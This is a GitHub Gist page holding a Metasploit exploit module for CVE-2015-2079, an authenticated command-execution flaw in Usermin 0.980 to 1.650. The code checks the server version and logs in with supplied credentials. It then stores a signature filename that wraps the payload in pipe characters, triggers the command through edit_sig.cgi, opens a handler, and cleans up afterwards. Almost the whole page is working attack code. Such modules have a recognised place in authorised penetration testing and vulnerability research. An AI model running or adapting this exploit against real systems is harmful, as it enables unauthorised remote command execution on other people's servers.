Last active
August 29, 2015 14:20
-
-
Save datenschrott/c9d3fb8f172810733f84 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
HttpFingerprint = { :pattern => [ /MiniServ/ ] } | |
include Msf::Exploit::Remote::HttpClient | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "Usermin 0.980-1.650 Authenticated Arbitrary Command Execution", | |
'Description' => %q{ | |
This modules exploits a vulnerability found in Usermin, version 0.980 up to | |
1.650. As an authenticated user, arbitrary command execution is possible by | |
manipulating the filename of an email signature file and triggering a function | |
to display the signature. | |
Payload hint: cmd/unix/*perl* works best because Usermin is based on Perl :-) | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => | |
[ | |
'David Elze < david.elze@code-white.com >' # Discovery & this simple MSF module | |
], | |
'References' => | |
[ | |
[ 'CVE', '2015-2079' ], | |
[ 'URL', 'http://codewhitesec.blogspot.de/2015/05/cve-2015-2079-rce-usermin.html'], | |
], | |
'Arch' => ARCH_CMD, | |
'Platform' => ['unix'], | |
'BadChars' => "", | |
'Compat' => | |
{ | |
'PayloadType' => 'cmd', | |
'RequiredCmd' => 'generic perl bash' | |
}, | |
'Targets' => | |
[ | |
['Usermin 0.980-1.650 on Linux', {}], | |
], | |
'DisclosureDate' => "Feb 23 2015", | |
'DefaultTarget' => 0, | |
'DefaultOptions' => | |
{ | |
'RPORT' => 20000 | |
})) | |
register_options( | |
[ | |
OptString.new('USERNAME', [ true, 'Usermin username', '']), | |
OptString.new('PASSWORD', [ true, 'Usermin password', '']), | |
OptString.new('TARGETURI', [true, 'The URI path to Usermin', '/']) | |
], self.class) | |
end | |
def check | |
uri = normalize_uri(target_uri.path) | |
uri << '/' if uri[-1, 1] != '/' | |
res = send_request_raw({ | |
'method' => 'GET', | |
'uri' => "#{uri}" | |
}) | |
ver = res.body.scan(/Usermin ([\.0-9]+)/).flatten.first | |
if res and is_version_vulnerable?(ver) | |
return Exploit::CheckCode::Appears | |
else | |
return Exploit::CheckCode::Safe | |
end | |
end | |
def is_version_vulnerable?(ver) | |
Gem::Version.new(ver) >= Gem::Version.new('0.980') && Gem::Version.new(ver) <= Gem::Version.new('1.650') | |
end | |
def exploit | |
http_handler = ((datastore['SSL']) ? "https" : "http") | |
uri = target_uri.path | |
url = "#{http_handler}://#{rhost}:#{rport}#{uri}" | |
print_status("Storing the malicious signature filename via uconfig_save.cgi ...") | |
res = send_request_cgi({ | |
'method' => 'POST', | |
'uri' => normalize_uri(uri, 'uconfig_save.cgi'), | |
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), | |
'headers' => { | |
'Referer' => "#{url}uconfig.cgi?module=mailbox§ion=line1" | |
}, | |
'vars_post' => { | |
'module' => "mailbox", | |
'sig_file' => "free", | |
'sig_file_free' => "|" + payload.encoded + "|", | |
'sig_mode' => "0", | |
'save' => "Save" | |
} | |
}) | |
unless res && res.code == 302 | |
fail_with(Failure::Unknown, "Something strange happened, abort!") | |
end | |
print_status("Calling the command via mailbox/edit_sig.cgi ...") | |
res = send_request_raw({ | |
'method' => 'GET', | |
'uri' => normalize_uri(uri, 'mailbox/edit_sig.cgi'), | |
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), | |
'headers' => { | |
'Referer' => "#{url}left.cgi?mail=1" | |
} | |
}) | |
unless res && res.code == 200 | |
fail_with(Failure::Unknown, "Something strange happened, abort!") | |
end | |
handler | |
print_status("Cleaning up by unsetting the Signature file...") | |
res = send_request_cgi({ | |
'method' => 'POST', | |
'uri' => normalize_uri(uri, 'uconfig_save.cgi'), | |
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), | |
'headers' => { | |
'Referer' => "#{url}uconfig.cgi?module=mailbox§ion=line1" | |
}, | |
'vars_post' => { | |
'module' => "mailbox", | |
'sig_file' => "*", | |
'sig_file_free' => "", | |
'sig_mode' => "0", | |
'save' => "Save" | |
} | |
}) | |
if res && res.code == 302 | |
print_status("...done.") | |
else | |
fail_with(Failure::Unknown, "Something strange happened, abort!") | |
end | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment